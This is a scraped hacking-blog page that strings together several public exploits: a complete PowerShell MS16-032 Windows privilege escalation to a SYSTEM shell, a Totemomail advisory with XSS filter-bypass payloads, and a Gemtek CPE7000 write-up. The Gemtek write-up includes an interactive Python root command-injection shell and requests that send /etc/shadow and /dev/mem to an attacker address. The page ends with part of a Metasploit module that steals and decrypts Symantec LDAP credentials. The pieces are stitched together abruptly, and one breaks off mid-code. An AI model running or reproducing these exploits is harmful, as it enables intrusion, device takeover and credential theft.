function Invoke-MS16-032 {
<#
.SYNOPSIS
PowerShell implementation of MS16-032. The exploit targets all vulnerable
operating systems that support PowerShell v2+. Credit for the discovery of
the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
Targets:
* Win7-Win10 & 2k8-2k12 <== 32/64 bit!
* Tested on x32 Win7, x64 Win8, x64 2k12R2
Notes:
* In order for the race condition to succeed the machine must have 2+ CPU
cores. If testing in a VM just make sure to add a core if needed mkay.
* Want to know more about MS16-032 ==>
https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
.DESCRIPTION
Author: Ruben Boonen (@FuzzySec)
Blog: http://www.fuzzysecurity.com/
License: BSD 3-Clause
Required Dependencies: PowerShell v2+
Optional Dependencies: None
.EXAMPLE
C:\PS> Invoke-MS16-032
#>
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
[StructLayout(LayoutKind.Sequential)]
public struct PROCESS_INFORMATION
{
public IntPtr hProcess;
public IntPtr hThread;
public int dwProcessId;
public int dwThreadId;
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
public struct STARTUPINFO
{
public Int32 cb;
public string lpReserved;
public string lpDesktop;
public string lpTitle;
public Int32 dwX;
public Int32 dwY;
public Int32 dwXSize;
public Int32 dwYSize;
public Int32 dwXCountChars;
public Int32 dwYCountChars;
public Int32 dwFillAttribute;
public Int32 dwFlags;
public Int16 wShowWindow;
public Int16 cbReserved2;
public IntPtr lpReserved2;
public IntPtr hStdInput;
public IntPtr hStdOutput;
public IntPtr hStdError;
}
[StructLayout(LayoutKind.Sequential)]
public struct SQOS
{
public int Length;
public int ImpersonationLevel;
public int ContextTrackingMode;
public bool EffectiveOnly;
}
public static class Advapi32
{
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
public static extern bool CreateProcessWithLogonW(
String userName,
String domain,
String password,
int logonFlags,
String applicationName,
String commandLine,
int creationFlags,
int environment,
String currentDirectory,
ref STARTUPINFO startupInfo,
out PROCESS_INFORMATION processInformation);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool SetThreadToken(
ref IntPtr Thread,
IntPtr Token);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenThreadToken(
IntPtr ThreadHandle,
int DesiredAccess,
bool OpenAsSelf,
out IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenProcessToken(
IntPtr ProcessHandle,
int DesiredAccess,
ref IntPtr TokenHandle);
[DllImport("advapi32.dll", SetLastError=true)]
public extern static bool DuplicateToken(
IntPtr ExistingTokenHandle,
int SECURITY_IMPERSONATION_LEVEL,
ref IntPtr DuplicateTokenHandle);
}
public static class Kernel32
{
[DllImport("kernel32.dll")]
public static extern uint GetLastError();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr GetCurrentProcess();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr GetCurrentThread();
[DllImport("kernel32.dll", SetLastError=true)]
public static extern int GetThreadId(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern int GetProcessIdOfThread(IntPtr handle);
[DllImport("kernel32.dll",SetLastError=true)]
public static extern int SuspendThread(IntPtr hThread);
[DllImport("kernel32.dll",SetLastError=true)]
public static extern int ResumeThread(IntPtr hThread);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool TerminateProcess(
IntPtr hProcess,
uint uExitCode);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool CloseHandle(IntPtr hObject);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool DuplicateHandle(
IntPtr hSourceProcessHandle,
IntPtr hSourceHandle,
IntPtr hTargetProcessHandle,
ref IntPtr lpTargetHandle,
int dwDesiredAccess,
bool bInheritHandle,
int dwOptions);
}
public static class Ntdll
{
[DllImport("ntdll.dll", SetLastError=true)]
public static extern int NtImpersonateThread(
IntPtr ThreadHandle,
IntPtr ThreadToImpersonate,
ref SQOS SecurityQualityOfService);
}
"@
function Get-ThreadHandle {
# StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO
$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
# ProcessInfo Struct
$ProcessInfo = New-Object PROCESS_INFORMATION
# CreateProcessWithLogonW --> lpCurrentDirectory
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
$CallResult = [Advapi32]::CreateProcessWithLogonW(
"user", "domain", "pass",
0x00000002, "C:\Windows\System32\cmd.exe", "",
0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo)
# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
$lpTargetHandle = [IntPtr]::Zero
$CallResult = [Kernel32]::DuplicateHandle(
$ProcessInfo.hProcess, 0x4,
[Kernel32]::GetCurrentProcess(),
[ref]$lpTargetHandle, 0, $false,
0x00000002)
# Clean up suspended process
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
$lpTargetHandle
}
function Get-SystemToken {
echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
$CallResult = [Kernel32]::SuspendThread($hThread)
if ($CallResult -ne 0) {
echo "[!] $hThread is a bad thread, exiting.."
Return
} echo "[+] Thread suspended"
echo "[>] Wiping current impersonation token"
$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
if (!$CallResult) {
echo "[!] SetThreadToken failed, exiting.."
$CallResult = [Kernel32]::ResumeThread($hThread)
echo "[+] Thread resumed!"
Return
}
echo "[>] Building SYSTEM impersonation token"
# SecurityQualityOfService struct
$SQOS = New-Object SQOS
$SQOS.ImpersonationLevel = 2 #SecurityImpersonation
$SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS)
# Undocumented API's, I like your style Microsoft ;)
$CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos)
if ($CallResult -ne 0) {
echo "[!] NtImpersonateThread failed, exiting.."
$CallResult = [Kernel32]::ResumeThread($hThread)
echo "[+] Thread resumed!"
Return
}
# Null $SysTokenHandle
$script:SysTokenHandle = [IntPtr]::Zero
# 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE
$CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle)
if (!$CallResult) {
echo "[!] OpenThreadToken failed, exiting.."
$CallResult = [Kernel32]::ResumeThread($hThread)
echo "[+] Thread resumed!"
Return
}
echo "[?] Success, open SYSTEM token handle: $SysTokenHandle"
echo "[+] Resuming thread.."
$CallResult = [Kernel32]::ResumeThread($hThread)
}
# main() <--- ;)
$ms16032 = @"
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
"@
$ms16032
# Check logical processor count, race condition requires 2+
echo "`n[?] Operating system core count: $([System.Environment]::ProcessorCount)"
if ($([System.Environment]::ProcessorCount) -lt 2) {
echo "[!] This is a VM isn't it, race condition requires at least 2 CPU cores, exiting!`n"
Return
}
echo "[>] Duplicating CreateProcessWithLogonW handle"
$hThread = Get-ThreadHandle
# If no thread handle is captured, the box is patched
if ($hThread -eq 0) {
echo "[!] No valid thread handle was captured, exiting!`n"
Return
} else {
echo "[?] Done, using thread handle: $hThread"
} echo "`n[*] Sniffing out privileged impersonation token.."
# Get handle to SYSTEM access token
Get-SystemToken
# If we fail a check in Get-SystemToken, exit
if ($SysTokenHandle -eq 0) {
Return
}
echo "`n[*] Sniffing out SYSTEM shell.."
echo "`n[>] Duplicating SYSTEM token"
$hDuplicateTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle)
# Simple PS runspace definition
echo "[>] Starting token race"
$Runspace = [runspacefactory]::CreateRunspace()
$StartTokenRace = [powershell]::Create()
$StartTokenRace.runspace = $Runspace
$Runspace.Open()
[void]$StartTokenRace.AddScript({
Param ($hThread, $hDuplicateTokenHandle)
while ($true) {
$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle)
}
}).AddArgument($hThread).AddArgument($hDuplicateTokenHandle)
$AscObj = $StartTokenRace.BeginInvoke()
echo "[>] Starting process race"
# Adding a timeout (10 seconds) here to safeguard from edge-cases
$SafeGuard = [diagnostics.stopwatch]::StartNew()
while ($SafeGuard.ElapsedMilliseconds -lt 10000) {
# StartupInfo Struct
$StartupInfo = New-Object STARTUPINFO
$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
# ProcessInfo Struct
$ProcessInfo = New-Object PROCESS_INFORMATION
# CreateProcessWithLogonW --> lpCurrentDirectory
$GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
$CallResult = [Advapi32]::CreateProcessWithLogonW(
"user", "domain", "pass",
0x00000002, "C:\Windows\System32\cmd.exe", "",
0x00000004, $null, $GetCurrentPath,
[ref]$StartupInfo, [ref]$ProcessInfo)
#---
# Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
#---
# Missing this check used to cause the exploit to fail sometimes.
# If CreateProcessWithLogon fails OpenProcessToken won't succeed
# but we obviously don't have a SYSTEM shell :'( . Should be 100%
# reliable now!
#---
if (!$CallResult) {
continue
}
$hTokenHandle = [IntPtr]::Zero
$CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
# If we can't open the process token it's a SYSTEM shell!
if (!$CallResult) {
echo "[!] Holy handle leak Batman, we have a SYSTEM shell!!`n"
$CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread)
$StartTokenRace.Stop()
$SafeGuard.Stop()
Return
}
# Clean up suspended process
$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
}
# Kill runspace & stopwatch if edge-case
$StartTokenRace.Stop()
$SafeGuard.Stop()
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863592080
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Document Title:
===============
Totemomail v4.x & v5.x - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1769
Release Date:
=============
2016-04-08
Vulnerability Laboratory ID (VL-ID):
====================================
1769
Common Vulnerability Scoring System:
====================================
3.8
Product & Service Introduction:
===============================
totemomail® Encryption Gateway protects your email communication with customers and business partners whereas
totemomail Internal Encryption secures your internal email traffic. In combination, they become the innovative and potent
hybrid encryption solution totemomail Hybrid Encryption. totemomail Encryption Gateway features a high level of security and
it is easy for end users and administrators alike to use. The everyday user will have no need to think about encryption because
the software is based on a high level of automation.
(Copy of the Vendor Homepage: http://www.totemo.com/products/mail/overview/introduction/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side vulnerability and a
filter bypass issue in the Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .
Vulnerability Disclosure Timeline:
==================================
2016-02-26: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-02-27: Vendor Notification (Totemomail Security Team)
2016-02-30: Vendor Response/Feedback (TotemomailSecurity Team)
2016-03-11: Vendor Fix/Patch (Totemomail Developer Team)
2016-04-13: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability and a filter bypass issue has been discovered in the official Totemo Email Gateway v4.0 b1343 and v5.0 b512 appliance series .
The filter bypass issue allows an attacker to evade the controls of a protection or restriction mechanism to compromise further web module context or service functions.
The persistent validation vulnerability allows an attacker to inject own malicious script codes on the application-side of the vulnerable web-application module context.
The persistent input validation web vulnerability has been discovered in the `Betreff(Subject)` and `Message (Body)` input fields of the `Neue Nachricht (New Message)` module.
The attacker can inject malicious script codes to the message body or subject input field. After the inject of the non exectuable context is get send to another manager by
secure mail interaction. After the arrival of the message the receiver clicks to `save as html`. In the moment the encoded mail context is generated as html, the malicious
injected tag is getting visible as executable context. The injection point of the vulnerability are the `subject` and `message body` input fields and the execution point
occurs in the moment the target manager generated the message as html to review or print.
The regular filter mechanism and validation does not allow to inject for example iframes and basic script code tags like script, iframe, div to the web input forms. As far as
an payload is included to for example the subject as listing the validation parses and encodes the string and show only the first two characters. We figured out that is possible
to bypass by usage of `img` script code tags with onload alert. The encoding of the input needs to be restricted permanently against special char inputs, the validation procedure
needs to parse and encode the input without extending the entry with a null location entry.
Vulnerable Module(s):
[+] Posteingang - Nachricht
Vulnerable Input(s):
[+] Subject (Betreff)
[+] Message Body (Nachricht)
Affected Module(s):
[+] Message Index (main.jsp)
[+] Save as Html (Als HTML Speichern)
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
1.1
Manual steps to reproduce the vulnerability ...
1. Open a new message
2. Include any random demo text first
3. Include now at least in the message body the script code payloads
4. Scroll above back to the subject and include the same payload to the subject input field
5. Save the entry as draft
6. You can now already see that the service attached to the script code another alt value
Note: "><img src="x" alt="null"> "><"<img src="x" alt="null">%20%20> ...
7. Now you send the message directly to a manager for reply
8. The manager received the message and treid to review it as html
9. The execution occurs in the subject and the message body of the html file
Note: The html file is wrong encoded and does not parse the values again next to generating the html source file
10. Successful reproduce of the filter bypass issue and persistent vulnerability!
PoC: Filter Bypass
"><"<img src="x">%20%20>"<iframe src=a>%20<iframe>
"><img src=x onerror=prompt(23);>
>"<<img src="c" onerror=alert(1)>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure filter and parse of img onload alert script code tags that actually can bypass the filter validation of the Betreff input fields.
After that encode and parse the print function that stream the context in html format were the execution point occurs finally.
Restrict the input finally and disallow usage of special chars in the subject input field to prevent persistent script code injection attacks.
In the second step a secure validation of the pgp key filename (email|preeshare) and input is required to secure encode the vulnerable email and name value of the certificate file.
Re-encode the editor text values to no get obviously broken format context back like demonstrated in the picture.
Fix (temp): Do not open email via save as function in html to prevent exploitation of the issue.
Totemo AG: The vulnerability is already patched in the newst version of the appliance web-application to protect customers.
The update can be processed automatically or by manual interaction with the web-service.
Security Risk:
==============
The security risk of the filter bypass issue and application-side input validation encoding vulnerability in the totemomail Hybrid Encryption appliance web-application.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
#!/usr/bin/python
'''
# Exploit Title: Gemtek CPE7000 / WLTCS-106 multiple vulnerabilities
# Date: 04/06/2016
# Exploit Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Vendor Homepage: gemtek.com.tw
# Version: Firmware Version 01.01.02.082
# Tested on:
# Product Name : CPE7000
# Model ID : WLTCS-106
# Hardware Version : V02A
# Firmware Version : 01.01.02.082
1) SID leak / auth bypass
The sysconfg cgi application leaks a valid "SID" (session id) when the
following unauthenticated request is made:
Request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1
The response body has the form: <checkcode>,<sid>
Example resp: RJIi,BtsS2OdhcVSbviDC5iMa1MKeo9rbrgdQ
The sid thus obtained can be used to "unlock" the cliend-side administration
interface and/or to directly issue request that are usually restricted to
administrative accounts.
POCs:
I) Unauthenticated remote reboot:
Request:
/cgi-bin/sysconf.cgi?page=ajax_check.asp&action=reboot&reason=1&sid=<SID>
II) Web admin interface access. Add a new cookie with the following values:
userlevel=2
sid=<sid>
--------------------------------------------------------------------------------
2) Arbitrary file download - with root privileges - via iperf tool
One of the diagnostic tools available on the device can be used to read an
arbitrary file on the device. The sysconfg cgi application fails to sanitize
user input, allowing an attacker to hijack the command issued to the "iperf"
binary, a commonly-used network testing tool that can create TCP and UDP data
streams and measure the throughput of a network that is carrying them.
The client-side validation can be easily bypassed by changing the javascript
validation code, or by directly sending a forged request to the server.
The iperf tool is run with the -c switch, meaning that it is behaving as a
client that sends data to a server. By adding the -F parameter, iperf is forced
to read data from a file instead of generating random data to be sent during the
measurement.
This attack needs 2 step in order to take advantage of the vulnerability.
The first request sets up the command be to run, the second one (a.k.a. toggle)
actually runs the command (check the response body, 1 means running, 0 means stopped).
The following "SETUP" request can be used to set the correct parameters:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=ZZ&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&
perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20 <URLENCODED PATH TO
FILE>
Parameters breakdown:
XXX.XXX.XXX.XXX = attacker ip
YYYY = attacker listening port
zz = time limit
Note: nc is enough to capture data, which may be sent with some additional
header and footer introduced by iperf's protocol
In order to run iperf, the following "TOGGLE" (run/stop) request must be sent:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
POCs:
I) download of /etc/shadow
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=30&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&p
erf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fetc%2fshadow
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
II) download of device physical memory (/dev/mem) with increased perf_measure_test_time:
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=X.X.X.X&perf_measure_server_port=YYYY&perf_measure_cpe_port=5554&perf_measure_
test_time=6000&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024
&perf_measure_bandwidth=19m&perf_measure_client_num=1%20-F%20%2fdev%2fmem
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
--------------------------------------------------------------------------------
3) Unauthenticated remote root command execution
The same vulnerability can be used to issue an arbitrary command on the device.
The command executed on the system to run the diagnostic tool is constructed
using the sprintf function and the following format string, with no additional
checks:
iperf -c "%s" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
It is therefore possible to insert another command by injecting it in the
"perf_measure_server_ip" parameter and commenting out the rest of the original
command.
To concatenate a command, the string in the first half before the injection
point ( iperf -c " ) must be correctly closed with quotes ( " ).
Then the new command can be added, preceded by a semicolon ( ; ).
Finally, the other part of the original command after the "injection point"
must be commented out ( # ).
iperf -c ""; <NEWCMD> #" -p %s -t %s -l %s -b %s -L %s -r -u > /tmp/iperf.txt &
SETUP REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20<COMMAND_HERE>%20%23&perf_measure_server_port=5555&perf_measure_cpe_p
ort=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_pac
ket_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1
RUN/STOP(Toggle) REQUEST:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
POC (echo test > /www/test):
/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_i
p=%22%3b%20echo%20test%20%3E%20%2fwww%2ftest%20%23&perf_measure_server_port=5555
&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type
=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_
client_num=1
and toggle:
/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle
--------------------------------------------------------------------------------
Remediation:
Disable wan access to the management web interface until an updated firmware is released.
More information and a detailed how-to is available at: http://www.mentat.is/docs/cpe7000-multiple-vulns.html
'''
#Gemtek CPE7000 / WLTCS-106 remote root command execution
#Author: Federico Ramondino - framondino[0x40]mentat[0x2e]is
# Tested on:
# Product Name : CPE7000
# Model ID : WLTCS-106
# Hardware Version : V02A
# Firmware Version : 01.01.02.082
import httplib
import ssl
import urllib
import time
import sys
import getopt
import socket
ssl._create_default_https_context = ssl._create_unverified_context
host=''
port = 443
def check():
try:
conn = httplib.HTTPSConnection(host +":"+str(port), timeout=10)
conn.request("GET", "/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1")
r1 = conn.getresponse()
if r1.status != 200:
return False
return True
except socket.error as msg:
print "Cannot connect";
sys.exit();
def sendcmd( cmd ):
resource = '"; ' + cmd + ' &> /www/cmdoutput.txt #'
urlencoded = urllib.quote_plus(resource)
cmdresource = "/cgi-bin/sysconf.cgi?page=ajax.asp&action=save_iperf_value&perf_measure_server_ip=" +urlencoded + "&perf_measure_server_port=5555&perf_measure_cpe_port=5554&perf_measure_test_time=60&perf_measure_protocol_type=1&perf_measure_packet_data_length=1024&perf_measure_bandwidth=19m&perf_measure_client_num=1"
res = makereq (cmdresource)
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
if(res!="1"):
res =makereq ("/cgi-bin/sysconf.cgi?page=ajax.asp&action=perf_measure_status_toggle")
time.sleep(1)
res = makereq ("/cmdoutput.txt")
print res
def makereq (resource):
conn = httplib.HTTPSConnection(host +":"+str(port))
conn.request("GET", resource)
r1 = conn.getresponse()
body = r1.read()
return body
if len(sys.argv) < 2:
print 'GemtekShell.py <host> [<port> (443)]'
exit()
elif len(sys.argv) > 2:
port = sys.argv[2]
host = sys.argv[1]
print 'Connecting to ', host, port
if not check() :
print "Host seems not vulnerable"
sys.exit()
while(1):
cmd = raw_input("gemtekCMD> ")
if cmd.strip() != "quit" :
sendcmd(cmd)
else :
sys.exit()
# Exploit Title: Symantec Brightmail ldap credential Grabber
# Date: 18/04/2016
# Exploit Author: Fakhir Karim Reda
# Vendor Homepage: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year&suid=20160418_00
# Version: 10.6.0-7 and earlier
# Tested on: Linux, Unox Windows
# CVE : CVE-2016-2203
#Symantec Brightmail 10.6.0-7 and earlier save the AD password somewhere in the product. By having a read account on the gateway we can recover the AD #ACOUNT/PASSWORD
#indeed the html code contains the encrypted AD password.
#the encryption and decryption part is implemented in Java in the appliance, by reversing the code we get to know the encryption algorithm:
#public static String decrypt(String password)
#{
#byte clearText[];
#try{
#PBEKeySpec keySpec = new PBEKeySpec("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"{}`~!@#$%^&*()_+-=".toCharArray());
#SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWithMD5AndDES");
#SecretKey secretKey = keyFactory.generateSecret(keySpec);
#System.out.println("Encoded key "+ (new String(secretKey.getEncoded())));
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require "base64"
require 'digest'
require "openssl"
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Symantec Messaging Gateway 10 LDAP Creds Graber',
'Description' => %q{
This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected
},
'References' =>
[
['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
['CVE','2016-2203'],
['BID','86137']
],
'Author' =>
[
'Fakhir Karim Reda <karim.fakhir[at]gmail.com>'
],
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'TLS1',
'RPORT' => 443
},
'License' => MSF_LICENSE,
'DisclosureDate' => "Dec 17 2015"
))
register_options(
[
OptInt.new('TIMEOUT', [true, 'HTTPS connect/read timeout in seconds', 1]),
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password to login with'])
], self.class)
deregister_options('RHOST')
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def report_cred(opts)
service_data = {
address: opts[:ip],
port: opts[:port],
service_name: 'LDAP',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: fullname,
username: opts[:user],
private_data: opts[:password],
private_type: :password
}.merge(service_data)
login_data = {
last_attempted_at: DateTime.now,
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
proof: opts[:proof]
}.merge(service_data)
create_credential_login(login_data)
end
def auth(username, password, sid, last_login)
# Real JSESSIONID cookie
sid2 = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/brightmail/login.do',
'headers' => {
'Referer' => "https://#{peer}/brightmail/viewLogin.do",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}",
'vars_post' => {
'lastlogin' => last_login,
'userLocale' => '',
'lang' => 'en_US',
'username' => username,
'password' => password,
'loginBtn' => 'Login'
}
})
if res.body =~ /Logged in/
sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
return sid2
end
if res and res.headers['Location']
mlocation = res.headers['Location']
new_uri = res.headers['Location'].scan(/^http:\/\/[\d\.]+:\d+(\/.+)/).flatten[0]
res = send_request_cgi({
'uri' => new_uri,
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}"
})
sid2 = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
return sid2 if res and res.body =~ /Logged in/
end
return false
end
def get_login_data
sid = '' #From cookie
last_login = '' #A hidden field in the login page
res = send_request_raw({'uri'=>'/brightmail/viewLogin.do'})
if res and !res.get_cookies.empty?
sid = res.get_cookies.scan(/JSESSIONID=([a-zA-Z0-9]+)/).flatten[0] || ''
end
if res
last_login = res.body.scan(/<input type="hidden" name="lastlogin" value="(.+)"\/>/).flatten[0] || ''
end
return sid, last_login
end
# Returns the status of the listening port.
#
# @return [Boolean] TrueClass if port open, otherwise FalseClass.
def port_open?
begin
res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
return true if res
rescue ::Rex::ConnectionRefused
print_status("#{peer} - Connection refused")
return false
rescue ::Rex::ConnectionError
print_error("#{peer} - Connection failed")
return false
rescue ::OpenSSL::SSL::SSLError
print_error("#{peer} - SSL/TLS connection error")
return false
end
end
# Returns the derived key from the password, the salt and the iteration count number.
#
# @return Array of byte containing the derived key.
def get_derived_key(password, salt, count)
key = password + salt
